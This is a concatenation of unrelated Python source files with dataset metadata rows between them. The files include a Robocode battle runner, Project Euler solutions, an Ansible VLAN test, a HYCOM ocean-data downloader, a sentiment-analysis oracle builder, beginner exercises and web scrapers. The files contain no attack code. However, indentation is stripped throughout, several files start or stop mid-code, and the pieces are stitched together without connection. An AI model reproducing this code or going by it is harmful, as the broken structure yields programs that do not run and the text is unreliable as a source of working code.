return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
def clean_white_space(array):
array = np.array([_clean_white_space(i) for i in array])
return array
def _clean_white_space(v):
if isinstance(v, str):
v = v.strip(" ")
return v
|
chechir/doors
|
doors/strings.py
|
strings.py
|
py
| 4,406 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8963786234
|
#!/usr/bin/env python3
import multiprocessing
from queue import Empty
import subprocess
import Robocode
import os, os.path
from datetime import datetime
import sys
import time
# This class knows about Robocode and the Database.
def recommendedWorkers():
cpus = multiprocessing.cpu_count()
if cpus > 12:
return cpus-2
elif cpus > 6:
return cpus-1
else:
return cpus
def BattleWorker( robocode, battledb, job_q, result_q ):
print('[{who}] Started:\n {db}\n {robo}'.format(
who = multiprocessing.current_process().name,
db = battledb,
robo = robocode
), file=sys.stderr)
try:
while True:
battle = job_q.get()
if battle.__class__ != Robocode.Battle:
# sentinel: no more jobs
print('[{0}] EndOfWork!'.format(
multiprocessing.current_process().name,
), file=sys.stderr)
break
start_time = datetime.now()
try:
battledb.MarkBattleRunning(battle.id)
print('[{who}] Running battle {id} between: {comps}'.format(
who = multiprocessing.current_process().name,
id = battle.id,
comps = ' '.join(battle.competitors),
), file=sys.stderr)
battle.run()
print('[{who}] Finished: {id}'.format(
who = multiprocessing.current_process().name,
id = battle.id,
), file=sys.stderr)
except subprocess.CalledProcessError as e:
print('[{who}] Battle invocation fails: {exc}\n{output}'.format(
who = multiprocessing.current_process().name,
exc = e.cmd,
output = e.output,
), file=sys.stderr)
if not battle.error:
# Only record the data if the battle succeeded.
battledb.BattleCompleted(battle.id,
battle.dbData(),
battle.result.dbData())
elapsed = datetime.now() - start_time
result_q.put(battle.id)
except Exception as e:
print('[{who}] Exception: {exc}'.format(
who = multiprocessing.current_process().name,
exc = e,
), file=sys.stderr)
raise e
print('[{0}] Finished!'.format(
multiprocessing.current_process().name,
), file=sys.stderr)
class BattleRunner:
def __init__( self, battledb, robocode, maxWorkers=None ):
self.battledb = battledb
self.robocode = robocode
self.job_q = multiprocessing.JoinableQueue()
self.result_q = multiprocessing.JoinableQueue()
self.workers = maxWorkers if maxWorkers is not None else recommendedWorkers()
self.job_count = 0
def start( self ):
# Start the workers.
self.pool = [ multiprocessing.Process( target = BattleWorker,
args=(self.robocode, self.battledb,
self.job_q, self.result_q) )
for i in range(self.workers) ]
for p in self.pool:
p.start()
def finish( self ):
print('[{0}] Sending EndOfWork signals'.format(
multiprocessing.current_process().name,
), file=sys.stderr)
for p in self.pool:
self.job_q.put(0)
# Consume everything in the result_q
while self.job_count > 0:
battleid = self.result_q.get()
self.job_count -= 1
for p in self.pool:
p.join()
def submit( self, battle ):
print('[{0}] Submitting battle #{1} '.format(
multiprocessing.current_process().name,
battle.id,
), file=sys.stderr)
self.job_q.put(battle)
self.job_count += 1
def running(self):
'''
check to see if any of the workers are still running
'''
for p in self.pool:
if p.is_alive():
return True
return False
def getResults(self):
'''
check to see if there are any results
'''
results = []
try:
results.append(self.result_q.get_nowait())
except Empty:
pass
return results
|
mojomojomojo/di-arena
|
lib/BattleRunner.py
|
BattleRunner.py
|
py
| 4,617 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34688027576
|
#!/usr/bin/python
def modular_helper(base, exponent, modulus, prefactor=1):
c = 1
for k in range(exponent):
c = (c * base) % modulus
return ((prefactor % modulus) * c) % modulus
def fibN(n):
phi = (1 + 5 ** 0.5) / 2
return int(phi ** n / 5 ** 0.5 + 0.5)
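# fibN uses the closed-form Binet expression round(phi**n / sqrt(5)); it is exact only while
# double precision holds (roughly n <= 70).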
# Alternate problem solutions start here
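# Note: primes() (used below) and the `data` module (problem0089a) are not defined in this file;
# they are assumed to be provided elsewhere in the project-euler repo.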
def problem0012a():
p = primes(1000)
n, Dn, cnt = 3, 2, 0
while cnt <= 500:
n, n1 = n + 1, n
if n1 % 2 == 0:
n1 = n1 // 2
Dn1 = 1
for pi in p:
if pi * pi > n1:
Dn1 = 2 * Dn1
break
exponent = 1
while n1 % pi == 0:
exponent += 1
n1 = n1 / pi
if exponent > 1:
Dn1 = Dn1 * exponent
if n1 == 1:
break
cnt = Dn * Dn1
Dn = Dn1
return (n - 1) * (n - 2) // 2
def problem0013a():
with open('problem0013.txt') as f:
s = f.readlines()
return int(str(sum(int(k[:11]) for k in s))[:10])
# solution due to veritas on Project Euler Forums
def problem0014a(ub=1000000):
table = {1: 1}
def collatz(n):
if not n in table:
if n % 2 == 0:
table[n] = collatz(n // 2) + 1
elif n % 4 == 1:
table[n] = collatz((3 * n + 1) // 4) + 3
else:
table[n] = collatz((3 * n + 1) // 2) + 2
return table[n]
    return max(range(ub // 2 + 1, ub, 2), key=collatz)
# 13 -> 40 -> 20 -> 10 -> 5 -> 16 -> 8 -> 4 -> 2 -> 1
# 13 -(3)-> 10 -(1)-> 5 -(3)-> 4 -(1)-> 2 -(1)-> 1
def veritas_iterative(ub=1000000):
table = {1: 1}
def collatz(n):
seq, steps = [], []
while not n in table:
seq.append(n)
if n % 2 and n % 4 == 1:
n, x = (3 * n + 1) // 4, 3
elif n % 2:
n, x = (3 * n + 1) // 2, 2
else:
n, x = n // 2, 1
steps.append(x)
x = table[n]
while seq:
n, xn = seq.pop(), steps.pop()
x = x + xn
table[n] = x
return x
    return max(range(ub // 2 + 1, ub, 2), key=collatz)
def problem0026a(n=1000):
return max(d for d in primes(n)
if not any(10 ** x % d == 1 for x in range(1, d - 1)))
def problem0031a():
def tally(*p):
d = (100, 50, 20, 10, 5, 2, 1)
return 200 - sum(k * v for k, v in zip(p, d))
c = 2
for p100 in range(2):
mp50 = int(tally(p100) / 50) + 1
for p50 in range(mp50):
mp20 = int(tally(p100, p50) / 20) + 1
for p20 in range(mp20):
mp10 = int(tally(p100, p50, p20) / 10) + 1
for p10 in range(mp10):
mp5 = int(tally(p100, p50, p20, p10) / 5) + 1
for p5 in range(mp5):
mp2 = int(tally(p100, p50, p20, p10, p5) / 2) + 1
for p2 in range(mp2):
c += 1
return c
def problem0089a():
n2r = [(1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
(100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
(10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')]
r2n = {b: a for a, b in n2r}
def to_roman(x):
s = []
while x:
n, c = next((n, c) for n, c in n2r if x >= n)
s.append(c)
x = x - n
return ''.join(s)
def from_roman(r):
k, s = 0, 0
while k < len(r):
if r[k] not in ('I', 'X', 'C') or k == len(r) - 1:
s = s + r2n[r[k]]
elif r[k:k+2] in r2n:
s = s + r2n[r[k:k+2]]
k = k + 1
else:
s = s + r2n[r[k]]
k = k + 1
return s
return sum(len(r) - len(to_roman(from_roman(r)))
for r in data.readRoman())
def problem0097a():
# Note 7830457 = 29 * 270015 + 22
# (10 ** 10 - 1) * 2 ** 29 does not overflow a 64 bit integer
p, b, e = 28433, 2, 7830457
d, m = divmod(e, 29)
prefactor = 28433 * 2 ** m
return modular_helper(2 ** 29, 270015, 10 ** 10, 28433 * 2 ** m) + 1
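    # i.e. 28433 * 2**7830457 + 1 = 28433 * 2**22 * (2**29)**270015 + 1, so the last ten digits
    # come from modular_helper(2**29, 270015, 10**10, 28433 * 2**22) + 1.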
|
pkumar0508/project-euler
|
alternate_solutions.py
|
alternate_solutions.py
|
py
| 4,179 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40409186941
|
#!/usr/bin/env python3
# unit_test/cisco/nxos/unit_test_nxos_vlan.py
our_version = 107
from ask.common.playbook import Playbook
from ask.common.log import Log
from ask.cisco.nxos.nxos_vlan import NxosVlan
ansible_module = 'nxos_vlan'
ansible_host = 'dc-101' # must be in ansible inventory
log = Log('unit_test_{}'.format(ansible_module), 'INFO', 'DEBUG')
def playbook():
pb = Playbook(log)
pb.profile_nxos()
pb.ansible_password = 'mypassword'
pb.file = '/tmp/{}.yaml'.format(ansible_module)
pb.name = '{} task'.format(ansible_module)
pb.add_host(ansible_host)
return pb
def add_task_name(task):
task.append_to_task_name('v{}, {}'.format(our_version, ansible_host))
for key in sorted(task.scriptkit_properties):
task.append_to_task_name(key)
def add_task(pb):
task = NxosVlan(log)
task.admin_state = 'up'
task.delay = 20
task.interfaces = ['Ethernet1/7', 'Ethernet1/8']
task.name = "my_vlan_2001"
task.mapped_vni = 20001
task.state = 'present'
task.vlan_id = 2001
task.vlan_state = 'active'
add_task_name(task)
task.commit()
pb.add_task(task)
def add_aggregate_task(pb):
task = NxosVlan(log)
task.admin_state = 'up'
task.delay = 20
task.interfaces = ['Ethernet1/9', 'Ethernet1/10']
task.name = "my_vlan_2002"
task.mapped_vni = 20002
task.state = 'present'
task.vlan_id = 2002
task.vlan_state = 'active'
task.add_vlan()
task.admin_state = 'down'
task.delay = 20
task.interfaces = ['Ethernet1/11', 'Ethernet1/12']
task.name = "my_vlan_2003"
task.mapped_vni = 20003
task.state = 'present'
task.vlan_id = 2003
task.vlan_state = 'active'
task.add_vlan()
task.task_name = 'aggregate vlans'
task.commit()
pb.add_task(task)
pb = playbook()
add_task(pb)
add_aggregate_task(pb)
pb.append_playbook()
pb.write_playbook()
log.info('wrote playbook {}'.format(pb.file))
|
allenrobel/ask
|
unit_test/cisco/nxos/unit_test_nxos_vlan.py
|
unit_test_nxos_vlan.py
|
py
| 1,944 |
python
|
en
|
code
| 2 |
github-code
|
6
|
22461213731
|
import xarray as xr
import numpy as np
# This script downloads HYCOM data for the selected periods of experiment GLBv0.08/expt_53.X
# Important: because of how the OpenDAP servers are structured, the data must be downloaded one time step at a time and concatenated afterwards
# To concatenate, select the desired files and use CDO; this processing is therefore best done on a Linux machine.
# Command: cdo cat <*.nc> <saidamodeloteste.nc>
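# Illustrative sketch (not part of the original workflow): the per-time-step files written below
# could also be concatenated from Python instead of the shell, assuming CDO is installed, e.g.:
#   import glob, subprocess
#   files = sorted(glob.glob('Hycom_Expt*_*.nc'))
#   subprocess.run(['cdo', 'cat', *files, 'hycom_concatenated.nc'], check=True)
# 'hycom_concatenated.nc' is a hypothetical output name.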
expt = ['http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_56.3',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_57.2',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_57.7',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_92.8',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_92.9',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_93.0',
]
# Input parameters - remember that the coordinates must be given in WGS84 decimal degrees
x = -73.575979
y = 11.552520
prof_ini = 0
prof_max = 1000
# Option to export an area around the point
# number of surrounding cells; 0 extracts only the grid location closest to the point
cell = 2
area = 0 + cell
for ex in expt:
hycom = xr.open_dataset(ex,decode_times=False,decode_cf=False)
if '_9' in ex:
hycom['lon'] = hycom.lon-360
    # extracting an area or single points from HYCOM
if area ==0:
hycom = hycom.sel(lon=x, lat=y,method='nearest')
hycom = hycom.sel(depth = slice(prof_ini,prof_max))
if area >0:
        # distance matrix
dist = ((hycom.lon-x)**2 + (hycom.lat-y)**2)**0.5
        # find the model index with the coordinates closest to the given point
ind = np.unravel_index(np.argmin(dist, axis=None), dist.shape)
hycom = hycom.isel(lon=slice(ind[0]-area,ind[0]+area), lat=slice(ind[1]-area,ind[1]+area))
hycom = hycom.sel(depth = slice(prof_ini,prof_max))
    # dropping variables that are not needed
hycom = hycom.drop(['tau','surf_el','water_temp_bottom','salinity_bottom','water_u_bottom','water_v_bottom'])
for i in list(range(0,len(hycom.time))):
try:
hyc = hycom.isel(time = i)
hyc = hyc.load()
hyc.to_netcdf('Hycom_Expt{}_{}.nc'.format(ex[-4:],i))
except:
pass
|
Igoratake/Hycom_Opendap
|
baixa_hycom_2014_frente_Pontual.py
|
baixa_hycom_2014_frente_Pontual.py
|
py
| 2,248 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
73789786749
|
valores = [[],[]]
for n in range(0,7):
v = int(input('digite um valor: '))
if v%2==0:
valores[0].append(v)
elif v%2!=0:
valores[1].append(v)
valores[0].sort()
valores[1].sort()
print(f'os valores pares foram: {valores[0]}' )
print(f'os valores impares foram: {valores[1]}' )
|
Kaue-Marin/Curso-Python
|
pacote dowlond/curso python/exercicio85.py
|
exercicio85.py
|
py
| 302 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
71971288509
|
from kubeflow.fairing.cloud.docker import get_docker_secret
from kubeflow.fairing.constants import constants
import json
import os
def test_docker_secret_spec():
os.environ["DOCKER_CONFIG"] = "/tmp"
config_dir = os.environ.get('DOCKER_CONFIG')
config_file_name = 'config.json'
config_file = os.path.join(config_dir, config_file_name)
with open(config_file, 'w+') as f:
json.dump({'config': "config"}, f)
docker_secret = get_docker_secret()
assert docker_secret.metadata.name == constants.DOCKER_CREDS_SECRET_NAME
os.remove(config_file)
|
kubeflow/fairing
|
tests/unit/cloud/test_docker.py
|
test_docker.py
|
py
| 578 |
python
|
en
|
code
| 336 |
github-code
|
6
|
69894822589
|
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
import datetime as dt
from airflow.utils.dates import days_ago
default_args = {
'owner': 'gregh',
'start_date': days_ago(0),
'email': ['[email protected]'],
'email_on_failure': True,
'email_on_retry': True,
'retries': 2,
'retry_delay': dt.timedelta(minutes=5)
}
dag = DAG(
dag_id='process_web_log',
schedule_interval=dt.timedelta(days=1),
default_args=default_args,
description='Airflow Web Log Daily Processor'
)
extract_data = BashOperator(
task_id='extract',
bash_command='cut -d "-" -f1 /home/project/airflow/dags/capstone/accesslogs.txt > /home/project/airflow/dags/capstone/extracted_data.txt',
dag=dag
)
transform_data = BashOperator(
task_id='transform',
bash_command='sed "/198.46.149.143/d" /home/project/airflow/dags/capstone/extracted_data.txt > /home/project/airflow/dags/capstone/transformed_data.txt',
dag=dag
)
load_data = BashOperator(
task_id='load',
bash_command='tar -cvf /home/project/airflow/dags/capstone/weblog.tar /home/project/airflow/dags/capstone/transformed_data.txt',
dag=dag
)
extract_data >> transform_data >> load_data
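# The >> operator declares task ordering: transform runs only after extract succeeds,
# and load only after transform.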
|
gregh13/Data-Engineering
|
Projects/Capstone Project/Task 5/Part Two - Apache Airflow ETL/process_web_log.py
|
process_web_log.py
|
py
| 1,221 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21354655285
|
#
# @lc app=leetcode.cn id=438 lang=python3
#
# [438] Find All Anagrams in a String
#
# @lc code=start
class Solution:
def findAnagrams(self, s: str, p: str) -> List[int]:
def s2vec(s):
vec = [0]*26
for c in s:
vec[ord(c)-ord('a')] += 1
return tuple(vec)
pvec = s2vec(p)
n = len(s)
b = 0
e = len(p)-1
if e>n:
return []
tvec = list(s2vec(s[b:e+1]))
ans = []
while e<n:
if tuple(tvec) == pvec:
ans.append(b)
tvec[ord(s[b])-ord('a')] -= 1
if e+1 == n:
break
tvec[ord(s[e+1])-ord('a')] += 1
b += 1
e += 1
return ans
# @lc code=end
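# Approach note: this is a sliding window of length len(p); tvec holds the 26-letter counts of the
# current window and is compared with pvec at every step, so the scan is O(26 * len(s)) instead of
# re-counting every substring from scratch.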
|
Alex-Beng/ojs
|
FuckLeetcode/438.找到字符串中所有字母异位词.py
|
438.找到字符串中所有字母异位词.py
|
py
| 801 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72056615229
|
spend_data = open("env_spending_ranks.csv")
ranks = [[] for _ in range(5)]
for i, line in enumerate(spend_data):
if i == 0:
continue
else:
temp = line.strip().split(',')
for j, element in enumerate(temp):
if j % 3 == 0:
ranks[j//3].append(element)
# 0: 2011, 4: 2015
ranks.reverse()
for year in ranks:
print(year)
states = []
state_rank_change = [0 for _ in range(50)]
for state in ranks[0]:
states.append(state)
states.sort()
yearly_ranks = [[0 for _ in range(50)] for _ in range(5)]
print(states)
for i, year in enumerate(ranks):
for j, state in enumerate(year):
for s, entry in enumerate(states):
if state == entry:
yearly_ranks[i][s] = j
differences = [0 for _ in range(50)]
for year in yearly_ranks:
print(year)
for i in range(50):
for j in range(1, 5):
diff = yearly_ranks[j-1][i] - yearly_ranks[j][i]
differences[i] += diff
# print(differences)
for_output = []
for i in range(50):
temp_str = states[i] + ": " + str(differences[i])
for_output.append(temp_str)
for out in for_output:
print(out)
spend_data.close()
|
jamesryan094/us_aqi_data_wrangling
|
ranks_per_year.py
|
ranks_per_year.py
|
py
| 1,172 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20444657924
|
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import time
import csv
class Scraper:
def __init__(self, url):
self.driver = webdriver.Chrome("./chromedriver", options=self.set_chrome_options())
self.url = url
self.open_url()
self.content = self.get_content()
def set_chrome_options(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-gpu")
return chrome_options
def open_url(self):
self.driver.get(self.url)
def get_content(self):
content = self.driver.page_source
soup = BeautifulSoup(content, "html.parser")
return soup
# retrieves all elements with a chosen html tag
def get_all_tags(self, tag="h1"):
all_tags = []
for element in self.content.select(tag):
all_tags.append(element.text.strip())
return all_tags
def get_items(self, product_container='div.thumbnail'):
top_items = []
products = self.content.select(product_container)
for elem in products:
title = elem.select('h4 > a.title')[0].text
review_label = elem.select('div.ratings')[0].text
info = {
"title": title.strip(),
"review": review_label.strip()
}
top_items.append(info)
print(top_items)
# return(top_items)
def get_all_products(self, content_container='div.thumbnail'):
all_products = []
products = self.content.select(content_container)
for product in products:
name = product.select('h4 > a')[0].text.strip()
description = product.select('p.description')[0].text.strip()
price = product.select('h4.price')[0].text.strip()
reviews = product.select('div.ratings')[0].text.strip()
image = product.select('img')[0].get('src')
all_products.append({
"name": name,
"description": description,
"price": price,
"reviews": reviews,
"image": image
})
# print(all_products)
return all_products
def quit(self):
self.driver.quit()
def save_product_csv(self, all_products):
keys = all_products[0].keys()
with open('products.csv', 'w', newline='') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(all_products)
if __name__ == "__main__":
urls = [
"https://webscraper.io/test-sites/e-commerce/allinone",
"https://webscraper.io/test-sites/e-commerce/allinone/computers",
"https://webscraper.io/test-sites/e-commerce/allinone/computers/laptops",
"https://webscraper.io/test-sites/e-commerce/allinone/computers/tablets",
"https://webscraper.io/test-sites/e-commerce/allinone/phones",
"https://webscraper.io/test-sites/e-commerce/allinone/phones/touch"
]
start_time = time.time()
for url in urls:
scraper = Scraper(url)
print("products:", scraper.get_all_products())
scraper.quit()
total_time = time.time() - start_time
print("time:", total_time)
|
RasbeeTech/Web-Scraper
|
scraper.py
|
scraper.py
|
py
| 3,381 |
python
|
en
|
code
| 1 |
github-code
|
6
|
6606609236
|
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
candirow = len(matrix) - 1
for row in range(len(matrix)):
if(matrix[row][0] > target):
if(row == 0):
return False
candirow = row - 1
break
elif(matrix[row][0] == target):
return True
        for i in range(1, len(matrix[0])):
            if(matrix[candirow][i] == target):
                return True
            if(matrix[candirow][i] > target):
                return False
        return False  # target is larger than every element in the candidate row
|
JeongGod/Algo-study
|
leehyowonzero/12week/search-a-2d-matrix.py
|
search-a-2d-matrix.py
|
py
| 603 |
python
|
en
|
code
| 7 |
github-code
|
6
|
19705123014
|
# -*- coding: utf-8 -*-
case = 0
while True:
N, Q = [int(x) for x in input().split()]
if not Q and not N:
break
case += 1
print(f"CASE# {case}:")
marbles = []
for _ in range(N):
marbles.append(int(input()))
marbles.sort()
for i in range(Q):
finding = int(input())
print(f"{finding} found at {marbles.index(finding) + 1}" if finding in marbles
else f"{finding} not found")
|
caioopra/4o-Semestre-CCO
|
paradigmas/2-python_multiparadigma/atividade2/1025.py
|
1025.py
|
py
| 526 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43216721070
|
import os
import shlex
import subprocess
import numpy as np
import pandas as pd
from SentiCR.SentiCR.SentiCR import SentiCR
def clean_data(df):
df = df.copy()
# fill all rows with corresponding discussion link
df[df['discussion_link'] == ""] = np.NaN
df['discussion_link'] = df['discussion_link'].fillna(method='ffill')
# keep only analyzed comments
df = df[df['comment_ok'].notnull()]
# identify contributors' comments
df['contributor_comment'] = df['removed'].str.contains("contributor's comment")
# save dataframe
df_complete = df.copy()
# remove all rows where change_ok is different than 'yes' or 'no'
df = df[(df['change_ok'] == 'yes') | (df['change_ok'] == 'no')]
# concatenate all answers to a discussion, as well as the last answer in the discussion, in a column
answers = []
last_answers = []
last_answer_is_from_contributor = []
for index, row in df.iterrows():
row_answers = df_complete[(df_complete['discussion_link'] == row['discussion_link']) &
(df_complete['filename'] == row['filename']) &
(df_complete['commented_line'] == row['commented_line']) &
(df_complete['comment'] != row['comment'])]
if not row_answers.empty:
last_answers.append(row_answers['comment'].iloc[-1])
last_answer_is_from_contributor.append(row_answers['contributor_comment'].iloc[-1])
else:
last_answers.append(np.NaN)
last_answer_is_from_contributor.append(np.NaN)
answers.append(' '.join(row_answers['comment']))
df['answers'] = answers
df['last_answer'] = last_answers
df['last_answer_is_from_contributor'] = last_answer_is_from_contributor
# keep only one instance per discussion
df = df.drop_duplicates(subset=['discussion_link', 'filename', 'method_signature', 'commented_line'], keep='first')
# discard rows without answers
df = df[df['answers'].str.len() > 0]
return df
def merge_and_clean_data(df, df_complete):
# fill all rows with corresponding discussion link
df[df['discussion_link'] == ""] = np.NaN
df['discussion_link'] = df['discussion_link'].fillna(method='ffill')
# keep only analyzed comments
df = df[df['comment_ok'].notnull()]
# remove all rows where change_ok is different than 'yes' or 'no'
df = df[(df['change_ok'] == 'yes') | (df['change_ok'] == 'no')]
# add original commented line to dataframe
for index, row in df.iterrows():
match = df_complete[(df_complete['url'] == row['discussion_link']) &
(df_complete['filename'] == row['filename']) &
(df_complete['message'] == row['comment'])]
if len(match) > 0:
df.loc[index, 'commented_line'] = match['original_line'].iloc[0]
# concatenate all answers to a discussion, as well as the last answer in the discussion, in a column
answers = []
last_answers = []
last_answer_is_from_contributor = []
for _, row in df.iterrows():
row_answers = df_complete[(df_complete['url'] == row['discussion_link']) &
(df_complete['filename'] == row['filename']) &
(df_complete['original_line'] == row['commented_line']) &
(df_complete['message'] != row['comment'])]
# sort by creation date
row_answers = row_answers.sort_values(by='created_at')
if not row_answers.empty:
last_answers.append(row_answers['message'].iloc[-1])
last_answer_is_from_contributor.append(row_answers['owner_id'].iloc[-1] == row_answers['user_id'].iloc[-1])
else:
last_answers.append(np.NaN)
last_answer_is_from_contributor.append(np.NaN)
answers.append(' '.join(row_answers['message']))
df['answers'] = answers
df['last_answer'] = last_answers
df['last_answer_is_from_contributor'] = last_answer_is_from_contributor
# keep only one instance per discussion
df = df.drop_duplicates(subset=['discussion_link', 'filename', 'method_signature', 'commented_line'], keep='first')
# discard rows without answers
df = df[df['answers'].str.len() > 0]
return df
def extract_polarity(df, strategy, sa_tool='sentistrength'):
# extract text to analyze depending on strategy
df[strategy] = df[strategy].replace(r'[\n\t\r]', ' ', regex=True).replace(r'\"', '', regex=True)
# run sentiment analysis
if sa_tool == 'sentistrength':
df.to_csv(f'{strategy}.tsv', sep='\t', columns=[strategy], index=True, header=False)
sentiment_analysis_process = subprocess.Popen(shlex.split('java uk/ac/wlv/sentistrength/SentiStrength '
f'sentidata {os.getcwd()}/SentiStrength-SE/ConfigFiles/ '
f'input ../{strategy}.tsv '
'annotateCol 2 overwrite '
'trinary'),
cwd="SentiStrength-SE/")
sentiment_analysis_process.communicate()
# read results
polarities = pd.read_csv(f'{strategy}.tsv', sep='\t',
names=['original_index', 'text', 'polarity_sentistrength'])
os.remove(f'{strategy}.tsv')
return df.merge(polarities, left_index=True, right_on='original_index')
else:
sentiment_analyzer = SentiCR()
df[f'polarity_senticr'] = df[strategy].apply(lambda x: sentiment_analyzer.get_sentiment_polarity(x)[0])
return df
def build_oracle():
df_all = clean_data(pd.read_csv('manual_analysis_all.csv'))
df_filtered = merge_and_clean_data(pd.read_csv('manual_analysis_filtered.csv'),
pd.read_csv('manual_analysis_filtered_complete.csv'))
# add polarity to dataframe (separately because indexes overlap)
df_all = extract_polarity(df_all, 'last_answer')
df_filtered = extract_polarity(df_filtered, 'last_answer')
df_all = extract_polarity(df_all, 'last_answer', 'senticr')
df_filtered = extract_polarity(df_filtered, 'last_answer', 'senticr')
# remove unnecessary columns
df_all = df_all.drop(['original_index', 'removed', 'commented_file'], axis=1)
df_filtered = df_filtered.drop(['can be identified as accepted'], axis=1)
# combine the two dataframes
df = pd.concat([df_all, df_filtered])
df.to_csv('oracle.csv', index=False)
return df
if __name__ == '__main__':
build_oracle()
|
saramangialavori/AutomatingCodeReview3.0
|
manual_inspection/build_oracle.py
|
build_oracle.py
|
py
| 6,785 |
python
|
en
|
code
| 0 |
github-code
|
6
|
18388623624
|
## First task
for i in range(1,10):
print(1/i)
## Second task
hatvany=int(input("Kérem a hatvány alapot:"))
kitevo=int(input("Kérem a hatvány kitevőt:"))
hatvanyertek=(hatvany**kitevo)
print(hatvanyertek)
## Third task
while True:
szam=int(input("Kérek egy pozitív számot: "))
if szam<=0:
print("Nem tudsz olvasni?? Pozitív szám!")
else:
print("Ügyes vagy!")
break
## Fourth task
a=int(input("Kérem az első számot: "))
b=int(input("Kérek a második számot: "))
if a>b:
print("A két szám közötti távolság: "+str(-(b-a)))
else:
print("A két szám közötti távolság: "+str(-(a-b)))
|
matyast/estioraimunka
|
feladat.py
|
feladat.py
|
py
| 700 |
python
|
hu
|
code
| 0 |
github-code
|
6
|
43597436816
|
# string: ordered, immutable, text representation
# init
from timeit import default_timer as timer
movie_name = "The murder on the orient express"
# single quote
fav_quote = 'That\'s what she said'
# print(fav_quote)
# double quote
fav_quote = "That's what she said"
# print(fav_quote)
quote = "Where should I go? \
To the left where nothing is right \
or to the right where nothing is left."
# print(quote)
# triple quote
quote = """Where should I go?
To the left where nothing is right
or to the right where nothing is left."""
# print(quote)
# indexing
movie_name = "The murder on the orient express"
# reverse string
# print(movie_name[::-1])
# slicing
# print(movie_name[4:10])
# print(movie_name[11:17])
# print(movie_name[-4])
# print(movie_name[9:3:-1])
# concate
greetings = "Good morning"
student_name = "John"
greetings = greetings + " " + student_name
# print(greetings)
# interation
# for char in student_name:
# if char == 'o':
# print("o in name")
# else:
# print("o not in name")
# print(char)
# check
# if 'o' in student_name:
# print('o in name')
# else:
# print('o not in name')
# white space
hello = " hello "
# print(hello.strip())
# upper lower
# print(hello.upper())
upper_hello = "HELLO"
# print(upper_hello.lower())
# startswith
akshit_email = "[email protected]"
aditya_name = "techbullsaditya"
anushka_name = "techbullsanushka"
# print(anushka_name.startswith("techbulls"))
# domain_name = [".com", ".in"]
# print(akshit_email.endswith(".com"))
# find
akshit_name = "akshit"
# print(akshit_name.find('s'))
# SHIT
s_index = akshit_name.find('s')
shit_name = akshit_name[s_index:]
upper_shit = shit_name.upper()
# print(upper_shit)
# print(akshit_name[akshit_name.find('s'):].upper())
# count
series_name = "The Woman in the House Across the Street from the Girl in the Window"
# print(series_name.count('the'))
# replace
# series_name = series_name.replace('the', 'anything')
# print(series_name)
# split
series_name_list = series_name.split(" ")
# print(series_name_list)
# join
series_name_join_with_comma = ",".join(series_name_list)
# print(series_name_join_with_comma)
# print(series_name.replace(" ", ","))
number_of_a = ['a'] * 100
# print(number_of_a)
# 01
start = timer()
a_join = "".join(number_of_a)
end = timer()
print(end-start)
# 02
start = timer()
a_join_using_loop = ""
for char_a in number_of_a:
a_join_using_loop += char_a
end = timer()
print(end-start)
# print(a_join)
# print(a_join_using_loop)
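# Note: "".join builds the result in a single pass, while += creates a new string object on each
# iteration (CPython can sometimes optimize this in place), which is why join is the recommended
# way to concatenate many pieces.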
# % .format() f-string
name = "akshit"
greetings = "Good morning"
student_roll_no = 123
print(f"{greetings}, this is my name: {name} roll no: {student_roll_no}")
# print("{} yello {}".format(greetings, name))
# print(greetings + " " + name + " " + str(student_roll_no))
# print(1+student_roll_no)
|
akshitone/fy-mca-class-work
|
DivB/string.py
|
string.py
|
py
| 2,834 |
python
|
en
|
code
| 1 |
github-code
|
6
|
18757756190
|
import argparse
import cv2
# argparse is used to capture the arguments passed when calling the .py from the command line
ap = argparse.ArgumentParser()
# Here we define the label of the expected argument
ap.add_argument("-i", "--image", required=True,
help= "Path to the image")
# We create a dictionary that will receive the argument values
# The dictionary keys are the labels created in the argument definition
args = vars(ap.parse_args())
# The vars() function returns the values corresponding to the object's __dict__ attribute
# Here we read the image, which is accessed through the disk path passed as an argument.
# We access the value in args using the same label from the argument definition as the dictionary key
image = cv2.imread(args["image"])
print("width: {} pixels".format(image.shape[1]))
print("height: {} pixels".format(image.shape[0]))
print("channels: {}".format(image.shape[2]))
print("Matrix shape: {}".format(image.shape))
cv2.imshow("Image", image)
cv2.waitKey(0)
cv2.imwrite("newimage.jpg", image)
|
CarlosAlfredoOliveiraDeLima/Practical-Python-and-OpenCV-Book
|
01 - load_display_save.py
|
01 - load_display_save.py
|
py
| 1,041 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
6118401140
|
''' Lesson 2. HTML parsing. BeautifulSoup, MongoDB
Collect information about vacancies for a job title entered by the user (via input) from the sites Superjob (optional) and HH (required). The application must analyze several pages of each site (the number of pages is also entered via input).
The resulting list must contain at least:
The vacancy title.
The offered salary (minimum and maximum separately).
A link to the vacancy itself.
The site the vacancy was collected from.
Optionally, additional vacancy parameters can be added (for example, the employer and the location). The structure must be the same for vacancies from both sites. The overall result can be displayed as a DataFrame via pandas.
'''
from bs4 import BeautifulSoup as bs
import requests
import json
from time import sleep
class HHscraper:
def __init__(self, start_url, headers, params):
self.start_url = start_url
self.start_headers = headers
self.start_params = params
self.info_vacance = []
